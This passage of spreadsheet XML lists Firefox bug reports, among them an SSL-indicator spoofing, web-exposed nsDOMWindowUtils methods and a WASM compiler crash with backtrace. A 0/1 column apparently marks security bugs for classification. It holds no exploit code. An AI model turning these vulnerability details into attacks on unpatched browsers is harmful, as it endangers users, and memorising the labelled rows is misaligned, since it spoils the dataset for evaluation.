          <t>2009-11-09 18:36:32 -0800</t>
        </is>
      </c>
      <c r="E4168" t="n">
        <v>1</v>
      </c>
      <c r="F4168" t="n">
        <v>1</v>
      </c>
      <c r="G4168" t="n">
        <v>3</v>
      </c>
      <c r="H4168" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4168" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4168" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4168" t="inlineStr">
        <is>
          <t>1.9.1 Branch</t>
        </is>
      </c>
      <c r="L4168" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4168" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4168" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4168" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4168" t="inlineStr">
        <is>
          <t>[sg:critical?][needs 1.9.2 landing]</t>
        </is>
      </c>
      <c r="Q4168" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4168" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4168" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4168" t="n">
        <v>1</v>
      </c>
      <c r="U4168" t="n">
        <v>0</v>
      </c>
      <c r="V4168" t="n">
        <v>29</v>
      </c>
      <c r="W4168" t="inlineStr">
        <is>
          <t>Created attachment 394908
test case
Attached test script seems to work on tm-tip, but the debugger tells a very different tell. Breaking on GetUpvarOnTrace:
(gdb) n
2311	            *result = state-&gt;stackBase[nativeStackFramePos + native_slot];
(gdb) n
2312	            return fi-&gt;get_typemap()[native_slot];
(gdb) x/1gx result
0xbfffc628:	0xcdcdcdcd00000002
(gdb) x/4bx fi + 1
0x80cb70:	0x07	0x00	0x05	0x01
The upvar in this script is an object. But the |fi| typemap has a TT_INT32 and the result contains not-an-object-at-all.
Why does it seem to work? The tracer guarded on TT_OBJECT and now it gets a TT_INT32, so it bails back to the interpreter, where the output is correct.
Indeed, upping the outer loop to 50 iterations shows that something is going wrong:
monitor: triggered(98), exits(98), type mismatch(0), global mismatch(0)</t>
        </is>
      </c>
      <c r="X4168" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4169">
      <c r="A4169" t="n">
        <v>485286</v>
      </c>
      <c r="B4169" t="inlineStr">
        <is>
          <t>2009-03-25 19:23:26 -0700</t>
        </is>
      </c>
      <c r="C4169" t="inlineStr">
        <is>
          <t>XSLT should heap allocate all evalContexts</t>
        </is>
      </c>
      <c r="D4169" t="inlineStr">
        <is>
          <t>2009-06-04 14:32:58 -0700</t>
        </is>
      </c>
      <c r="E4169" t="n">
        <v>1</v>
      </c>
      <c r="F4169" t="n">
        <v>1</v>
      </c>
      <c r="G4169" t="n">
        <v>3</v>
      </c>
      <c r="H4169" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4169" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4169" t="inlineStr">
        <is>
          <t>XSLT</t>
        </is>
      </c>
      <c r="K4169" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4169" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4169" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4169" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4169" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4169" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q4169" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4169" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4169" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T4169" t="n">
        <v>1</v>
      </c>
      <c r="U4169" t="n">
        <v>0</v>
      </c>
      <c r="V4169" t="n">
        <v>22</v>
      </c>
      <c r="W4169" t="inlineStr">
        <is>
          <t>Created attachment 369413
Proposed fix
bug 485217 fixed one case where we fail to pop a stack-allocated evalContext in an error condition. However, with the patch in that bug, it's possible to re-enter the interpreter and push a heap-allocated eval context (via a txPushNewContext instruction). If, after we handle such an instruction, we hit an error, then we'll leave that eval context on the stack and, when we retreat back into the code fixed in bug 485217, we'll pop the *wrong* context, leaving the same error as before.
The patch I'm attaching basically backs out the patch in bug 485217 per sicking's request to make the error handling consistent (you never pop someone else's context, but all contexts are heap allocated, so we can safely clean them up at the end).</t>
        </is>
      </c>
      <c r="X4169" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4170">
      <c r="A4170" t="n">
        <v>1667456</v>
      </c>
      <c r="B4170" t="inlineStr">
        <is>
          <t>2020-09-25 12:39:53 -0700</t>
        </is>
      </c>
      <c r="C4170" t="inlineStr">
        <is>
          <t>SSL Spoofing due to Attacker page (HTTP: URL) opened on a popup by a Tab who contains a secure Domain (HTTPS: URL)</t>
        </is>
      </c>
      <c r="D4170" t="inlineStr">
        <is>
          <t>2022-05-30 04:53:22 -0700</t>
        </is>
      </c>
      <c r="E4170" t="n">
        <v>1</v>
      </c>
      <c r="F4170" t="n">
        <v>1</v>
      </c>
      <c r="G4170" t="n">
        <v>2</v>
      </c>
      <c r="H4170" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4170" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4170" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K4170" t="inlineStr">
        <is>
          <t>80 Branch</t>
        </is>
      </c>
      <c r="L4170" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4170" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4170" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4170" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4170" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main88+][adv-esr78.10+]</t>
        </is>
      </c>
      <c r="Q4170" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4170" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S4170" t="inlineStr">
        <is>
          <t>88 Branch</t>
        </is>
      </c>
      <c r="T4170" t="n">
        <v>1</v>
      </c>
      <c r="U4170" t="n">
        <v>0</v>
      </c>
      <c r="V4170" t="n">
        <v>25</v>
      </c>
      <c r="W4170" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:78.0) Gecko/20100101 Firefox/78.0
Steps to reproduce:
STR 1: Go to the Testcase and click to the button "Click Me" (a New Popup will be opened with the Attacker Webpage with the HTTP: URL).
(The Testcase should be opened by the "HTTPS:" URL with a Valid SSL Indicator or should loaded another "HTTPS:" URL Target Domain after the click on button by user to open the Popup)
STR 2: On the new Popup opened Click to the Button "Click Me" on the Attacker webpage (HTTP: URL) .
(The HTTP:// webpage on the Popup will open a new tab LEADING TO SSL Spoofing)
RESULTS:
This Leads to a SSL Spoofing. The HTTP:// webpage opened on a new tab by the Popup Attacker Page (Same HTTP: URL) have now a SSL Indicator leading to a SSL Spoofing.
SSL Spoofing due to Attacker page (HTTP: URL) opened on a popup by a Tab who contains a secure Domain (HTTPS: URL)
Actual results:
This Leads to a SSL Spoofing. The HTTP:// webpage opened on a new tab by the Popup Attacker Page (Same HTTP: URL) have now a SSL Indicator leading to a SSL Spoofing.
Expected results:
This leads to a SSL Spoofing security issue.</t>
        </is>
      </c>
      <c r="X4170" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4171">
      <c r="A4171" t="n">
        <v>775868</v>
      </c>
      <c r="B4171" t="inlineStr">
        <is>
          <t>2012-07-20 00:56:42 -0700</t>
        </is>
      </c>
      <c r="C4171" t="inlineStr">
        <is>
          <t>several nsDOMWindowUtils methods available to untrusted code</t>
        </is>
      </c>
      <c r="D4171" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E4171" t="n">
        <v>1</v>
      </c>
      <c r="F4171" t="n">
        <v>1</v>
      </c>
      <c r="G4171" t="n">
        <v>3</v>
      </c>
      <c r="H4171" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4171" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4171" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4171" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4171" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4171" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4171" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4171" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4171" t="inlineStr">
        <is>
          <t>[advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q4171" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4171" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4171" t="inlineStr">
        <is>
          <t>mozilla18</t>
        </is>
      </c>
      <c r="T4171" t="n">
        <v>1</v>
      </c>
      <c r="U4171" t="n">
        <v>0</v>
      </c>
      <c r="V4171" t="n">
        <v>64</v>
      </c>
      <c r="W4171" t="inlineStr">
        <is>
          <t>Created attachment 644216
Beginning of a fix.
This surfaced when investigating bug 701299, and potential causes for it. Turns out several methods in nsDOMWindowUtils are not protected by security checks, so any webpage can call them. The unprotected methods are at least, but maybe not limited to:
GetImageAnimationMode
SetImageAnimationMode
Redraw
ElementFromPoint
GetIsMozAfterPaintPending
ClearMozAfterPaintEvents
GetScrollXY
GetIMEIsOpen
GetIMEStatus
GetFocusedInputType
FindElementWithViewId
EnterModalState
LeaveModalState
EnterModalStateWithWindow
LeaveModalStateWithWindow
IsInModalState
GetOuterWindowID
GetCurrentInnerWindowID
GetLayerManagerType
StartFrameTimeRecording
StopFrameTimeRecording
RenderDocument
GetCursorType
GetDisplayDPI
WrapDOMFile
CheckAndClearPaintedState
IsIncrementalGCEnabled
StartPCCountProfiling
StopPCCountProfiling
PurgePCCounts
GetPCCountScriptCount
GetPCCountScriptSummary
GetPCCountScriptContents
GetPaintingSuppressed
Some of those (though not many) are not callable from script (i.e. they take non-scriptable arguments, like JSContext* or what not), so they may be ok, but the majority are not ok.
This is trivially fixable by adding IsUniversalXPConnect() checks in all those methods, but that breaks tests, so we need someone to spend some time fixing up the broken tests. I'll add a patch that pretty blindly just adds the checks, but it needs more work, and I've utterly failed to find the time to fix this up, so someone else needs to take this over... Andrew, maybe you can take a stab at driving this in?
Guessing that this is sg:critical, mostly because of the shear number of unknowns here.</t>
        </is>
      </c>
      <c r="X4171" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4172">
      <c r="A4172" t="n">
        <v>1275582</v>
      </c>
      <c r="B4172" t="inlineStr">
        <is>
          <t>2016-05-25 07:39:16 -0700</t>
        </is>
      </c>
      <c r="C4172" t="inlineStr">
        <is>
          <t>TSan: data race security/nss/lib/freebl/sha_fast.c:176 SHA1_End</t>
        </is>
      </c>
      <c r="D4172" t="inlineStr">
        <is>
          <t>2017-01-05 09:13:28 -0800</t>
        </is>
      </c>
      <c r="E4172" t="n">
        <v>1</v>
      </c>
      <c r="F4172" t="n">
        <v>1</v>
      </c>
      <c r="G4172" t="n">
        <v>3</v>
      </c>
      <c r="H4172" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4172" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4172" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K4172" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4172" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4172" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4172" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4172" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4172" t="inlineStr">
        <is>
          <t>[psm-assigned][post-critsmash-triage][adv-main48+]</t>
        </is>
      </c>
      <c r="Q4172" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4172" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4172" t="inlineStr">
        <is>
          <t>mozilla49</t>
        </is>
      </c>
      <c r="T4172" t="n">
        <v>1</v>
      </c>
      <c r="U4172" t="n">
        <v>0</v>
      </c>
      <c r="V4172" t="n">
        <v>16</v>
      </c>
      <c r="W4172" t="inlineStr">
        <is>
          <t>STR currently unknown.  This was reported 5 times when using a TSan-enabled
build of m-c for general surfing for around half an hour, with 12 tabs.
I will endeavour to find repeatable STR.
From the thread names involved ...
  Thread T29 'SSL Cert #13' (tid=13287, running)
  Thread T73 'SSL Cert #12' (tid=13284, running)
... I'd guess that there are multiple instances of some worker thread to do
with SSL Certs, and they are racing each other.  Only a guess though.</t>
        </is>
      </c>
      <c r="X4172" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4173">
      <c r="A4173" t="n">
        <v>1442829</v>
      </c>
      <c r="B4173" t="inlineStr">
        <is>
          <t>2018-03-02 18:17:09 -0800</t>
        </is>
      </c>
      <c r="C4173" t="inlineStr">
        <is>
          <t>Remove macBrowserOverlay.xul</t>
        </is>
      </c>
      <c r="D4173" t="inlineStr">
        <is>
          <t>2018-03-19 15:46:49 -0700</t>
        </is>
      </c>
      <c r="E4173" t="n">
        <v>1</v>
      </c>
      <c r="F4173" t="n">
        <v>1</v>
      </c>
      <c r="G4173" t="n">
        <v>2</v>
      </c>
      <c r="H4173" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4173" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4173" t="inlineStr">
        <is>
          <t>Menus</t>
        </is>
      </c>
      <c r="K4173" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4173" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4173" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4173" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4173" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4173" t="inlineStr"/>
      <c r="Q4173" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4173" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4173" t="inlineStr">
        <is>
          <t>Firefox 61</t>
        </is>
      </c>
      <c r="T4173" t="n">
        <v>1</v>
      </c>
      <c r="U4173" t="n">
        <v>0</v>
      </c>
      <c r="V4173" t="n">
        <v>8</v>
      </c>
      <c r="W4173" t="inlineStr">
        <is>
          <t>With the removal of editMenuOverlay, baseMenuOverlay, and places.xul it should now be possible to remove macBrowserOverlay by using the preprocessor to include the needed pieces directly into hiddenWindow.xul and browser.xul.
Feel free to move this bug, I'm not quite sure what component this should go in.</t>
        </is>
      </c>
      <c r="X4173" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4174">
      <c r="A4174" t="n">
        <v>1277830</v>
      </c>
      <c r="B4174" t="inlineStr">
        <is>
          <t>2016-06-03 05:15:30 -0700</t>
        </is>
      </c>
      <c r="C4174" t="inlineStr">
        <is>
          <t>Investigate decline in Firefox dashboard numbers</t>
        </is>
      </c>
      <c r="D4174" t="inlineStr">
        <is>
          <t>2018-10-15 11:08:31 -0700</t>
        </is>
      </c>
      <c r="E4174" t="n">
        <v>1</v>
      </c>
      <c r="F4174" t="n">
        <v>1</v>
      </c>
      <c r="G4174" t="n">
        <v>6</v>
      </c>
      <c r="H4174" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4174" t="inlineStr">
        <is>
          <t>Cloud Services Graveyard</t>
        </is>
      </c>
      <c r="J4174" t="inlineStr">
        <is>
          <t>Metrics: Pipeline</t>
        </is>
      </c>
      <c r="K4174" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4174" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4174" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4174" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4174" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4174" t="inlineStr"/>
      <c r="Q4174" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4174" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4174" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4174" t="n">
        <v>1</v>
      </c>
      <c r="U4174" t="n">
        <v>0</v>
      </c>
      <c r="V4174" t="n">
        <v>16</v>
      </c>
      <c r="W4174" t="inlineStr">
        <is>
          <t>The main Firefox dashboard shows an unexpected decline in total hours, as well as an unexpected upward spike in Yahoo search share. Check whether this is legitimate or noise.</t>
        </is>
      </c>
      <c r="X4174" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4175">
      <c r="A4175" t="n">
        <v>1879237</v>
      </c>
      <c r="B4175" t="inlineStr">
        <is>
          <t>2024-02-07 18:14:42 -0800</t>
        </is>
      </c>
      <c r="C4175" t="inlineStr">
        <is>
          <t>[WASM] MOZ_ASSERT(v.isMem() == result.onStack());</t>
        </is>
      </c>
      <c r="D4175" t="inlineStr">
        <is>
          <t>2024-09-16 00:27:09 -0700</t>
        </is>
      </c>
      <c r="E4175" t="n">
        <v>1</v>
      </c>
      <c r="F4175" t="n">
        <v>1</v>
      </c>
      <c r="G4175" t="n">
        <v>3</v>
      </c>
      <c r="H4175" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4175" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4175" t="inlineStr">
        <is>
          <t>JavaScript: WebAssembly</t>
        </is>
      </c>
      <c r="K4175" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4175" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4175" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4175" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4175" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4175" t="inlineStr">
        <is>
          <t>[adv-main124+]</t>
        </is>
      </c>
      <c r="Q4175" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4175" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S4175" t="inlineStr">
        <is>
          <t>125 Branch</t>
        </is>
      </c>
      <c r="T4175" t="n">
        <v>1</v>
      </c>
      <c r="U4175" t="n">
        <v>0</v>
      </c>
      <c r="V4175" t="n">
        <v>19</v>
      </c>
      <c r="W4175" t="inlineStr">
        <is>
          <t>Created attachment 9378912
poc0208.js
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Steps to reproduce:
OS      : Linux ubuntu 5.11.10 #1 SMP Sat Oct 30 23:40:08 CST 2021 x86_64 x86_64 x86_64 GNU/Linux
Commit  : 719b4a8853b449674c018178f85b3667afe4f193
Build   : 
ac_add_options --enable-project=js
ac_add_options --disable-optimize
ac_add_options --disable-unified-build
ac_add_options --enable-debug
ac_add_options --disable-jemalloc
Running: 
./js --wasm-memory-control --wasm-compiler=baseline --wasm-exnref poc.js
Actual results:
```
Stopped reason: SIGSEGV
0x0000555559313036 in js::wasm::BaseCompiler::shuffleStackResultsBeforeBranch (this=0x7fffffff2be8, srcHeight=..., destHeight=..., type=...) at gecko-dev-latest/js/src/wasm/WasmBaselineCompile.cpp:1298
1298	      MOZ_ASSERT(v.isMem() == result.onStack());
gdb-peda$ bt
#0  0x0000555559313036 in js::wasm::BaseCompiler::shuffleStackResultsBeforeBranch(js::wasm::StackHeight, js::wasm::StackHeight, js::wasm::ResultType)
    (this=0x7fffffff2be8, srcHeight=..., destHeight=..., type=...) at gecko-dev-latest/js/src/wasm/WasmBaselineCompile.cpp:1298
#1  0x0000555559319a19 in js::wasm::BaseCompiler::jumpConditionalWithResults(js::wasm::BranchState*, js::wasm::RegRef, js::wasm::RefType, js::wasm::RefType, bool) (this=0x7fffffff2be8, b=0x7ffffffee658, object=..., sourceType=..., destType=..., onSuccess=0x0)
    at gecko-dev-latest/js/src/wasm/WasmBaselineCompile.cpp:3245
#2  0x000055555932e8a1 in js::wasm::BaseCompiler::emitBrOnCastCommon(bool, unsigned int, js::wasm::ResultType const&amp;, js::wasm::RefType, js::wasm::RefType) (this=0x7fffffff2be8, onSuccess=0x0, labelRelativeDepth=0x0, labelType=..., sourceType=..., destType=...)
    at gecko-dev-latest/js/src/wasm/WasmBaselineCompile.cpp:8392
#3  0x000055555932ea8d in js::wasm::BaseCompiler::emitBrOnCast(bool) (this=0x7fffffff2be8, onSuccess=0x0)
    at gecko-dev-latest/js/src/wasm/WasmBaselineCompile.cpp:8418
#4  0x0000555559343057 in js::wasm::BaseCompiler::emitBody() (this=0x7fffffff2be8)
    at gecko-dev-latest/js/src/wasm/WasmBaselineCompile.cpp:10629
#5  0x000055555936831a in js::wasm::BaseCompiler::emitFunction() (this=0x7fffffff2be8)
    at gecko-dev-latest/js/src/wasm/WasmBaselineCompile.cpp:11740
#6  0x0000555559369669 in js::wasm::BaselineCompileFunctions(js::wasm::ModuleEnvironment const&amp;, js::wasm::CompilerEnvironment const&amp;, js::LifoAlloc&amp;, mozilla::Vector&lt;js::wasm::FuncCompileInput, 8ul, js::SystemAllocPolicy&gt; const&amp;, js::wasm::CompiledCode*, mozilla::UniquePtr&lt;char [], JS::FreePolicy&gt;*)
     (moduleEnv=..., compilerEnv=..., lifo=..., inputs=..., code=0x55555a0b1280, error=0x7fffffff5658)
    at gecko-dev-latest/js/src/wasm/WasmBaselineCompile.cpp:11917
#7  0x000055555943b9e4 in ExecuteCompileTask(js::wasm::CompileTask*, mozilla::UniquePtr&lt;char [], JS::FreePolicy&gt;*)
    (task=0x55555a0b0ed0, error=0x7fffffff5658) at gecko-dev-latest/js/src/wasm/WasmGenerator.cpp:735
#8  0x000055555943bbe4 in js::wasm::ModuleGenerator::locallyCompileCurrentTask() (this=0x7fffffff4560)
    at gecko-dev-latest/js/src/wasm/WasmGenerator.cpp:784
#9  0x000055555943c777 in js::wasm::ModuleGenerator::finishFuncDefs() (this=0x7fffffff4560)
    at gecko-dev-latest/js/src/wasm/WasmGenerator.cpp:915
#10 0x0000555559414106 in DecodeCodeSection&lt;js::wasm::Decoder&gt;(js::wasm::ModuleEnvironment const&amp;, js::wasm::Decoder&amp;, js::wasm::ModuleGenerator&amp;)
    (env=..., d=..., mg=...) at gecko-dev-latest/js/src/wasm/WasmCompile.cpp:785
#11 0x0000555559413e32 in js::wasm::CompileBuffer(js::wasm::CompileArgs const&amp;, js::wasm::ShareableBytes const&amp;, mozilla::UniquePtr&lt;char [], JS::FreePolicy&gt;*, mozilla::Vector&lt;mozilla::UniquePtr&lt;char [], JS::FreePolicy&gt;, 0ul, js::SystemAllocPolicy&gt;*, JS::OptimizedEncodingListener*)
    (args=..., bytecode=..., error=0x7fffffff5658, warnings=0x7fffffff56a0, listener=0x0)
    at gecko-dev-latest/js/src/wasm/WasmCompile.cpp:807
#12 0x00005555594fe1ce in js::WasmModuleObject::construct(JSContext*, unsigned int, JS::Value*) (cx=0x555559f66060, argc=0x1, vp=0x55555a0731c8)
    at gecko-dev-latest/js/src/wasm/WasmJS.cpp:1494
#13 0x0000555557982f26 in CallJSNative(JSContext*, bool (*)(JSContext*, unsigned int, JS::Value*), js::CallReason, JS::CallArgs const&amp;)
    (cx=0x555559f66060, native=0x5555594fddd0 &lt;js::WasmModuleObject::construct(JSContext*, unsigned int, JS::Value*)&gt;, reason=js::CallReason::Call, args=...) at gecko-dev-latest/js/src/vm/Interpreter.cpp:480
#14 0x00005555579940ea in CallJSNativeConstructor(JSContext*, bool (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;)
    (cx=0x555559f66060, native=0x5555594fddd0 &lt;js::WasmModuleObject::construct(JSContext*, unsigned int, JS::Value*)&gt;, args=...)
    at gecko-dev-latest/js/src/vm/Interpreter.cpp:496
#15 0x000055555794a3ae in InternalConstruct(JSContext*, js::AnyConstructArgs const&amp;, js::CallReason)
    (cx=0x555559f66060, args=..., reason=js::CallReason::Call) at gecko-dev-latest/js/src/vm/Interpreter.cpp:702
#16 0x0000555557949dc1 in js::ConstructFromStack(JSContext*, JS::CallArgs const&amp;, js::CallReason)
    (cx=0x555559f66060, args=..., reason=js::CallReason::Call) at gecko-dev-latest/js/src/vm/Interpreter.cpp:749
#17 0x000055555795f13e in js::Interpret(JSContext*, js::RunState&amp;) (cx=0x555559f66060, state=...)
    at gecko-dev-latest/js/src/vm/Interpreter.cpp:3046
#18 0x00005555579488ac in MaybeEnterInterpreterTrampoline(JSContext*, js::RunState&amp;) (cx=0x555559f66060, state=...)
    at gecko-dev-latest/js/src/vm/Interpreter.cpp:394
#19 0x0000555557948492 in js::RunScript(JSContext*, js::RunState&amp;) (cx=0x555559f66060, state=...)
    at gecko-dev-latest/js/src/vm/Interpreter.cpp:452
#20 0x000055555794b257 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JS::Handle&lt;JSObject*&gt;, js::AbstractFramePtr, JS::MutableHandle&lt;JS::Value&gt;)
    (cx=0x555559f66060, script=0xc92dfd66060, envChainArg=(JSObject * const) 0xc92dfd3f038 [object LexicalEnvironment], evalInFrame=AbstractFramePtr ((js::InterpreterFrame *) 0x0) = {...}, result=$JS::UndefinedValue()) at gecko-dev-latest/js/src/vm/Interpreter.cpp:839
#21 0x000055555794b65c in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JS::Handle&lt;JSObject*&gt;, JS::MutableHandle&lt;JS::Value&gt;)
    (cx=0x555559f66060, script=0xc92dfd66060, envChain=(JSObject * const) 0xc92dfd3f038 [object LexicalEnvironment], rval=$JS::UndefinedValue())
    at gecko-dev-latest/js/src/vm/Interpreter.cpp:871
#22 0x0000555557dca0df in ExecuteScript(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSScript*&gt;, JS::MutableHandle&lt;JS::Value&gt;)
    (cx=0x555559f66060, envChain=(JSObject * const) 0xc92dfd3f038 [object LexicalEnvironment], script=0xc92dfd66060, rval=$JS::UndefinedValue())
    at gecko-dev-latest/js/src/vm/CompilationAndEvaluation.cpp:494
#23 0x0000555557dca206 in JS_ExecuteScript(JSContext*, JS::Handle&lt;JSScript*&gt;) (cx=0x555559f66060, scriptArg=0xc92dfd66060)
    at gecko-dev-latest/js/src/vm/CompilationAndEvaluation.cpp:518
#24 0x00005555577d0527 in RunFile(JSContext*, char const*, _IO_FILE*, CompileUtf8, bool, bool)
    (cx=0x555559f66060, filename=0x55555a07a5a0 "/tmp/crash3.js", file=0x555559ffe250, compileMethod=CompileUtf8::DontInflate, compileOnly=0x0, fullParse=0x0) at gecko-dev-latest/js/src/shell/js.cpp:1221
#25 0x00005555577cfba0 in Process(JSContext*, char const*, bool, FileKind)
    (cx=0x555559f66060, filename=0x55555a07a5a0 "/tmp/crash3.js", forceTTY=0x0, kind=FileScript)
    at gecko-dev-latest/js/src/shell/js.cpp:1801
#26 0x000055555779bb7b in ProcessArgs(JSContext*, js::cli::OptionParser*) (cx=0x555559f66060, op=0x7fffffffdec0)
    at gecko-dev-latest/js/src/shell/js.cpp:10905
#27 0x0000555557792c57 in Shell(JSContext*, js::cli::OptionParser*) (cx=0x555559f66060, op=0x7fffffffdec0)
    at gecko-dev-latest/js/src/shell/js.cpp:11167
#28 0x000055555778d969 in main(int, char**) (argc=0x5, argv=0x7fffffffe118) at gecko-dev-latest/js/src/shell/js.cpp:11571
#29 0x00007ffff7a48083 in __libc_start_main () at /lib/x86_64-linux-gnu/libc.so.6
#30 0x0000555557753b79 in _start ()
```</t>
        </is>
      </c>
      <c r="X4175" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4176">
      <c r="A4176" t="n">
        <v>1793676</v>
      </c>
      <c r="B4176" t="inlineStr">
        <is>
          <t>2022-10-04 13:25:55 -0700</t>
        </is>
      </c>
      <c r="C4176" t="inlineStr">
        <is>
          <t>Potential keystroke side-channel leakage</t>
        </is>
      </c>
      <c r="D4176" t="inlineStr">
        <is>
          <t>2023-06-12 23:51:56 -0700</t>
        </is>
      </c>
      <c r="E4176" t="n">
        <v>1</v>
      </c>
      <c r="F4176" t="n">
        <v>1</v>
      </c>
      <c r="G4176" t="n">
        <v>3</v>
      </c>
